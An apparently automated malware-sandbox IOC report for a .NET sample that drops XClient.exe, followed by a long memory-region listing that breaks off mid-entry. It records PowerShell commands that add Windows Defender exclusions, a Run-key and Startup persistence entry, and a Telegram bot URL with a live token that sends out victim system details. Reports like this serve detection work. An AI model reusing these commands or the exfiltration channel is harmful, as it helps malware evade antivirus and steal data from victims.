IOC Report
z0LTqIdZ4A.exe

loading gif

Files

File Path
Type
Category
Malicious
z0LTqIdZ4A.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\XClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2srbw2cv.5rt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zll2czj.ujz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amf3b1ux.vy5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqaufyng.uzk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fltctdoq.e5x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmvaauh3.w50.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdtwnbtm.gf3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkhvfo0p.d2f.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obeios0a.opb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4v4c2dp.ur4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q55b0cc4.axz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s30ooyxh.he1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxmya4mo.qa4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucmct3tt.4iz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ullhplw1.bnh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztu1i5bc.tyl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Apr 20 20:41:00 2024, mtime=Sat Apr 20 20:41:00 2024, atime=Sat Apr 20 20:41:00 2024, length=169984, window=hide
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\z0LTqIdZ4A.exe
"C:\Users\user\Desktop\z0LTqIdZ4A.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\z0LTqIdZ4A.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'z0LTqIdZ4A.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
malicious
C:\Users\user\AppData\Roaming\XClient.exe
"C:\Users\user\AppData\Roaming\XClient.exe"
malicious
C:\Users\user\AppData\Roaming\XClient.exe
"C:\Users\user\AppData\Roaming\XClient.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
93.123.39.225
malicious
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136&text=%E2%98%A0%20%5BXSPY%20-%20@RUSSAGENT%20%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFF6BC8E90A1001FE1454%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%206Z46G%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XSpy%20By%20EagleSpy
149.154.167.220
http://nuget.org/NuGet.exe
unknown
https://api.telegram.org/bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=68627
unknown
https://api.telegram.org
unknown
http://www.microsoft.t
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://api.telegrP
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
https://ion=v4.5n
unknown
http://api.telegram.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://schemas.microsoft.co
unknown
https://github.com/Pester/Pester
unknown
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
api.telegram.org
149.154.167.220

IPs

IP
Domain
Country
Malicious
93.123.39.225
unknown
Bulgaria
malicious
149.154.167.220
api.telegram.org
United Kingdom

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\z0LTqIdZ4A_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2C93000
trusted library allocation
page read and write
malicious
2C4D000
trusted library allocation
page read and write
malicious
8E2000
unkown
page readonly
malicious
12BE1000
trusted library allocation
page read and write
malicious
1EFD207B000
trusted library allocation
page read and write
1F701893000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1F701898000
trusted library allocation
page read and write
1F76D94D000
heap
page read and write
7DF4C58D0000
trusted library allocation
page execute and read and write
990000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
2C68000
trusted library allocation
page read and write
12D3000
heap
page read and write
121C000
heap
page read and write
1243000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
17B4B1A9000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9BA80000
trusted library allocation
page read and write
1F701E2A000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
1D16C000
stack
page read and write
1F710010000
trusted library allocation
page read and write
D30000
trusted library allocation
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
1EFDA5B0000
heap
page read and write
1F701126000
trusted library allocation
page read and write
D4E3E8C000
stack
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
17B33A52000
trusted library allocation
page read and write
17B30FC5000
heap
page read and write
1BEC3000
stack
page read and write
1F76B6F0000
trusted library allocation
page read and write
17B3437F000
trusted library allocation
page read and write
7FFD9B958000
trusted library allocation
page read and write
7FFD9BB6C000
trusted library allocation
page read and write
1EFC0260000
heap
page read and write
7FFD9B79B000
trusted library allocation
page execute and read and write
1460000
heap
page read and write
1EFC2D07000
trusted library allocation
page read and write
1EFC2D10000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
17B32FBD000
trusted library allocation
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
7FFD9B780000
trusted library allocation
page read and write
1F76D9AE000
heap
page read and write
7FFD9BAA3000
trusted library allocation
page read and write
2B653CE000
stack
page read and write
7DF46A5F0000
trusted library allocation
page execute and read and write
7FFD9BB70000
trusted library allocation
page read and write
1F701097000
trusted library allocation
page read and write
1EFC3B71000
trusted library allocation
page read and write
17B42B21000
trusted library allocation
page read and write
DAF000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1EFC36E5000
trusted library allocation
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
7FFD9B962000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
17B4B097000
heap
page read and write
1DFB57AB000
trusted library allocation
page read and write
1BB8E000
stack
page read and write
1DFCCAB0000
heap
page execute and read and write
45ECCF8000
stack
page read and write
2C88000
trusted library allocation
page read and write
45EC97E000
stack
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
1EFD1D91000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
1252000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BAE8000
trusted library allocation
page read and write
D60000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1EFD2080000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
820000
heap
page read and write
1F701165000
trusted library allocation
page read and write
C666FD000
stack
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
7FFD9BA70000
trusted library allocation
page read and write
17B30F70000
trusted library allocation
page read and write
1F76D5E6000
heap
page read and write
2C8F000
trusted library allocation
page read and write
C664FE000
stack
page read and write
1570000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
17B34917000
trusted library allocation
page read and write
1DFB62FC000
trusted library allocation
page read and write
17B30F90000
trusted library allocation
page read and write
1EFC02DD000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
127C000
heap
page read and write
D4E3D8E000
stack
page read and write
1EFDA240000
heap
page execute and read and write
7FFD9BBCD000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
2C9B000
trusted library allocation
page read and write
1DFCC831000
heap
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
640000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
2E1E000
stack
page read and write
1DFCCAEC000
heap
page read and write
1DFC4501000
trusted library allocation
page read and write
1DFB5568000
trusted library allocation
page read and write
C6770C000
stack
page read and write
25AF000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
2CAE000
trusted library allocation
page read and write
17B33A5B000
trusted library allocation
page read and write
1F70130C000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BAD2000
trusted library allocation
page read and write
1F76D5E0000
heap
page read and write
1F700228000
trusted library allocation
page read and write
17B32D18000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
17B30D00000
heap
page read and write
D4E29FE000
stack
page read and write
D4E30BE000
stack
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
17B32820000
heap
page execute and read and write
1DFB4325000
heap
page read and write
2B6467F000
stack
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9B826000
trusted library allocation
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
7FFD9B910000
trusted library allocation
page read and write
1F76CF70000
trusted library allocation
page read and write
2B6457E000
stack
page read and write
D4E2FB7000
stack
page read and write
45ECFBE000
stack
page read and write
1F701E06000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page read and write
1F710001000
trusted library allocation
page read and write
1F76DA82000
heap
page read and write
1EFC3BB6000
trusted library allocation
page read and write
1F76B6B0000
heap
page read and write
1DFC47BA000
trusted library allocation
page read and write
D8F000
heap
page read and write
7FFD9B93A000
trusted library allocation
page read and write
1EFC1B50000
heap
page read and write
1EFC0265000
heap
page read and write
45ECD3F000
stack
page read and write
45ECA7E000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1F76DA94000
heap
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
10F0000
heap
page read and write
C66579000
stack
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
2590000
heap
page execute and read and write
1DFC44D1000
trusted library allocation
page read and write
25B1000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BB7E000
trusted library allocation
page read and write
1F76B4D1000
heap
page read and write
1F76D080000
heap
page read and write
540000
heap
page read and write
1C3DE000
stack
page read and write
1DFC44F1000
trusted library allocation
page read and write
A9F000
stack
page read and write
1EFC1CE0000
trusted library allocation
page read and write
E4D000
heap
page read and write
17B32AA0000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1EFC2CFF000
trusted library allocation
page read and write
1DFCCD50000
heap
page read and write
1EFC27E2000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1DFB2860000
trusted library section
page read and write
1DFCC9A0000
heap
page read and write
1DFB2A70000
heap
page readonly
1EFDA2C5000
heap
page read and write
1DFB5896000
trusted library allocation
page read and write
1C632000
heap
page read and write
1EFC02C2000
heap
page read and write
1F7102F9000
trusted library allocation
page read and write
D4E303B000
stack
page read and write
1EFC2993000
trusted library allocation
page read and write
1430000
heap
page read and write
D63000
trusted library allocation
page read and write
7B0000
trusted library allocation
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
2CBF000
trusted library allocation
page read and write
2B63DCF000
stack
page read and write
7FFD9B912000
trusted library allocation
page read and write
2E70000
heap
page read and write
17B4AEBE000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9BA93000
trusted library allocation
page read and write
1EFDA32C000
heap
page read and write
1EFC2E55000
trusted library allocation
page read and write
CF4000
stack
page read and write
12E88000
trusted library allocation
page read and write
1F76B4D9000
heap
page read and write
17B33A57000
trusted library allocation
page read and write
C669BE000
stack
page read and write
7FFD9BB80000
trusted library allocation
page read and write
1DFCCC61000
heap
page read and write
17B3372D000
trusted library allocation
page read and write
1DFCCAD8000
heap
page read and write
7FFD9BAC4000
trusted library allocation
page read and write
1DFB57DE000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1B8EB000
heap
page read and write
2B6427F000
stack
page read and write
1EFDA5E3000
heap
page read and write
1DFB44D1000
trusted library allocation
page read and write
7FFD9BAC4000
trusted library allocation
page read and write
1EFC3BBB000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1EFC30D6000
trusted library allocation
page read and write
1DFB46FA000
trusted library allocation
page read and write
1F76B519000
heap
page read and write
7FFD9BADC000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
7FFD9BAD5000
trusted library allocation
page read and write
1CE6A000
stack
page read and write
14B0000
trusted library allocation
page read and write
1D06C000
stack
page read and write
C665FE000
stack
page read and write
2C5C000
trusted library allocation
page read and write
1DFCCC7A000
heap
page read and write
17B42B11000
trusted library allocation
page read and write
D4E297E000
stack
page read and write
1DFCCC21000
heap
page read and write
1F701215000
trusted library allocation
page read and write
C661DE000
stack
page read and write
17B30DC6000
heap
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
C66677000
stack
page read and write
1F76D941000
heap
page read and write
1F76D685000
heap
page read and write
1DFB50D8000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
1EFC1D91000
trusted library allocation
page read and write
1250000
heap
page read and write
1DFB44C0000
heap
page read and write
D4E3F0E000
stack
page read and write
1EFDA5F8000
heap
page read and write
1EFC0240000
heap
page read and write
C66A3E000
stack
page read and write
7FFD9B902000
trusted library allocation
page read and write
17B30FB0000
trusted library allocation
page read and write
1DFB5244000
trusted library allocation
page read and write
6A0000
heap
page read and write
1DFCCAE8000
heap
page read and write
1EFD2099000
trusted library allocation
page read and write
1EFDA4CC000
heap
page read and write
1F76CF30000
heap
page execute and read and write
7FFD9B794000
trusted library allocation
page read and write
17B4B0D3000
heap
page read and write
C6647E000
stack
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9B968000
trusted library allocation
page read and write
1B5C3000
heap
page read and write
1EFC0380000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
890000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
7FFD9BAC8000
trusted library allocation
page read and write
1BD9E000
stack
page read and write
45ECE3A000
stack
page read and write
4F4000
stack
page read and write
1130000
heap
page read and write
1EFC35FD000
trusted library allocation
page read and write
1C639000
heap
page read and write
125A8000
trusted library allocation
page read and write
D4E3D0C000
stack
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7FFD9BAE0000
trusted library allocation
page read and write
2B6417E000
stack
page read and write
9C0000
heap
page read and write
12E81000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1DFB2888000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
D4E2D7E000
stack
page read and write
7FFD9B980000
trusted library allocation
page read and write
1DFB56AD000
trusted library allocation
page read and write
1F701787000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
25A1000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1EFC2C2C000
trusted library allocation
page read and write
7FFD9BAD9000
trusted library allocation
page read and write
7FFD9BADA000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1EFC2F3D000
trusted library allocation
page read and write
1DFCC86C000
heap
page read and write
2B6524E000
stack
page read and write
1DFCCAD4000
heap
page read and write
1F7004CD000
trusted library allocation
page read and write
1DFB44C5000
heap
page read and write
1C5F5000
heap
page read and write
1F700C31000
trusted library allocation
page read and write
7FFD9B954000
trusted library allocation
page read and write
2B651CC000
stack
page read and write
1EFC1D30000
heap
page execute and read and write
1EFC1B90000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1EFC2CFB000
trusted library allocation
page read and write
1F76D09F000
heap
page read and write
1F76D951000
heap
page read and write
7FFD9BAD4000
trusted library allocation
page read and write
1EFC1D70000
heap
page read and write
1DFB2A97000
heap
page execute and read and write
17B30D86000
heap
page read and write
2B645FE000
stack
page read and write
1DFCCAD0000
heap
page read and write
2E8C000
trusted library allocation
page read and write
F7F000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1EFD1DC1000
trusted library allocation
page read and write
7FFD9B912000
trusted library allocation
page read and write
17B4B040000
heap
page read and write
1B720000
heap
page read and write
1F76D914000
heap
page read and write
7FFD9B92A000
trusted library allocation
page read and write
17B33A70000
trusted library allocation
page read and write
1DFC47BE000
trusted library allocation
page read and write
1B94E000
stack
page read and write
7FFD9B958000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1DFB5E25000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
7FFD9B820000
trusted library allocation
page execute and read and write
1F701005000
trusted library allocation
page read and write
1F701252000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page read and write
17B32826000
heap
page execute and read and write
9A0000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
1F7011DC000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1F701389000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1F76B4ED000
heap
page read and write
45EDC07000
stack
page read and write
17B4B0FD000
heap
page read and write
2B643F9000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
E33000
heap
page read and write
17B42DFA000
trusted library allocation
page read and write
1F700A52000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1CC2E000
stack
page read and write
2CD2000
trusted library allocation
page read and write
45EC8FE000
stack
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1F76B710000
trusted library allocation
page read and write
17B4B140000
heap
page read and write
1EFC303C000
trusted library allocation
page read and write
7FFD9BA33000
trusted library allocation
page read and write
1AC10000
trusted library allocation
page read and write
1EFC3518000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1DFB5D3E000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1DFCCC8A000
heap
page read and write
1DFB50CE000
trusted library allocation
page read and write
1EFC2E29000
trusted library allocation
page read and write
1F76B4D5000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
1310000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
1F76D9D0000
heap
page read and write
1EFDA29D000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
17B4B030000
heap
page read and write
1F701E25000
trusted library allocation
page read and write
17B336F3000
trusted library allocation
page read and write
1B8E6000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
7FFD9B762000
trusted library allocation
page read and write
1DFCC8F3000
heap
page read and write
1EFD2088000
trusted library allocation
page read and write
1DFB2905000
heap
page read and write
1EFD2082000
trusted library allocation
page read and write
125A1000
trusted library allocation
page read and write
1F76DA61000
heap
page read and write
800000
heap
page execute and read and write
7DF4AA7A0000
trusted library allocation
page execute and read and write
1F76D8F0000
heap
page read and write
1EFD1DB1000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
1DFB2B70000
heap
page read and write
12C9000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1F76DA9C000
heap
page read and write
1EFC225D000
trusted library allocation
page read and write
1F76B470000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
1DFB54D8000
trusted library allocation
page read and write
12E8000
heap
page read and write
1EFC3686000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page read and write
45EDB0E000
stack
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
C66836000
stack
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
2B6514E000
stack
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
D4E3C8F000
stack
page read and write
7FFD9B774000
trusted library allocation
page read and write
12F5000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1216000
heap
page read and write
17B4AEB1000
heap
page read and write
1DFCC8B2000
heap
page read and write
17B33A63000
trusted library allocation
page read and write
1BC8C000
stack
page read and write
1DFB5CC4000
trusted library allocation
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
17B33A6C000
trusted library allocation
page read and write
7FFD9B902000
trusted library allocation
page read and write
7FFD9BB7C000
trusted library allocation
page read and write
1B931000
heap
page read and write
14D0000
trusted library allocation
page read and write
17B4AE63000
heap
page read and write
1DFB524D000
trusted library allocation
page read and write
895000
heap
page read and write
D7C000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
125A3000
trusted library allocation
page read and write
1F76B745000
heap
page read and write
1B890000
heap
page read and write
1EFDA2E8000
heap
page read and write
12E83000
trusted library allocation
page read and write
17B348CD000
trusted library allocation
page read and write
1DFB4F23000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
7FFD9B810000
trusted library allocation
page read and write
1DFB28DE000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1210000
heap
page read and write
2CEE000
trusted library allocation
page read and write
1B17D000
stack
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1EFC3157000
trusted library allocation
page read and write
7FFD9BBBB000
trusted library allocation
page read and write
17B33BB3000
trusted library allocation
page read and write
1DFCC86A000
heap
page read and write
17B4AE30000
heap
page read and write
1EFC0308000
heap
page read and write
1BC9E000
stack
page read and write
1DFCC867000
heap
page read and write
D4E2CF9000
stack
page read and write
7FFD9BB70000
trusted library allocation
page read and write
1B8BB000
heap
page read and write
1DFB27F0000
heap
page read and write
7FFD9B78B000
trusted library allocation
page read and write
1C624000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
6DA000
heap
page read and write
1F7102EB000
trusted library allocation
page read and write
1DFB577C000
trusted library allocation
page read and write
1EFC1D80000
heap
page execute and read and write
7FFD9B920000
trusted library allocation
page read and write
1CD6E000
stack
page read and write
1F710309000
trusted library allocation
page read and write
17B42DE0000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
1F710031000
trusted library allocation
page read and write
7D0000
trusted library allocation
page read and write
6D0000
heap
page read and write
1F701954000
trusted library allocation
page read and write
D4E31BE000
stack
page read and write
1CAF0000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B7CC000
trusted library allocation
page execute and read and write
1DFC47D8000
trusted library allocation
page read and write
17B4B111000
heap
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1DFB27C0000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
45ED0BE000
stack
page read and write
2B646FE000
stack
page read and write
7DF4AA790000
trusted library allocation
page execute and read and write
17B34319000
trusted library allocation
page read and write
1EFC1FB9000
trusted library allocation
page read and write
2BD0000
heap
page execute and read and write
1F70133F000
trusted library allocation
page read and write
17B33E30000
trusted library allocation
page read and write
2B6534C000
stack
page read and write
1F76B720000
heap
page readonly
7FFD9BA80000
trusted library allocation
page read and write
12F3000
heap
page read and write
17B32AE0000
heap
page execute and read and write
1EFC02C8000
heap
page read and write
1EFDA5EB000
heap
page read and write
1F700FA1000
trusted library allocation
page read and write
1DFB5D64000
trusted library allocation
page read and write
1EFDA250000
heap
page read and write
D4E2DF9000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1B770000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
45EC9FE000
stack
page read and write
1EFC3623000
trusted library allocation
page read and write
8F4000
unkown
page readonly
7FFD9B820000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B948000
trusted library allocation
page read and write
1F76D949000
heap
page read and write
45ED03C000
stack
page read and write
7FFD9B952000
trusted library allocation
page read and write
17B4B1AD000
heap
page read and write
1DFB55F7000
trusted library allocation
page read and write
1BABF000
stack
page read and write
1DFCCB12000
heap
page read and write
17B33C17000
trusted library allocation
page read and write
1F76D6D0000
heap
page read and write
D50000
trusted library allocation
page read and write
1DFB62B2000
trusted library allocation
page read and write
17B32950000
heap
page read and write
1CAEA000
stack
page read and write
17B32AF1000
trusted library allocation
page read and write
1DFCC825000
heap
page read and write
7FFD9B880000
